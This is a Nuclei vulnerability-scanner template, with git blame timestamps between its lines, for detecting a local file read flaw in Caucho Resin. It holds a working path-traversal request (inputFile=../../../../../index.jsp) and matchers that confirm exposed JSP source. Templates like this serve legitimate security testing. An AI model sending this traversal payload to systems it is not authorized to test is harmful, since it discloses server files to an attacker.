nuclei-templates/http/vulnerabilities/other/resin-inputfile-fileread.yaml

25 lines
784 B
YAML
Raw Normal View History

2021-04-22 13:46:56 +00:00
id: resin-inputfile-fileread
2021-04-22 13:46:56 +00:00
info:
name: Caucho Resin LFR
author: princechaddha
severity: high
2021-08-09 13:08:19 +00:00
description: A vulnerability in Caucho Resin allows remote unauthenticated users to utilize the 'inputFile' variable to include the content of locally stored files and disclose their content.
reference:
- https://blkstone.github.io/2017/10/30/resin-attack-vectors/
2021-04-22 13:46:56 +00:00
tags: resin,caucho,lfr
http:
2021-04-22 13:46:56 +00:00
- method: GET
path:
- "{{BaseURL}}/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
2021-06-23 20:58:18 +00:00
- "%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %"
2021-04-22 13:46:56 +00:00
part: body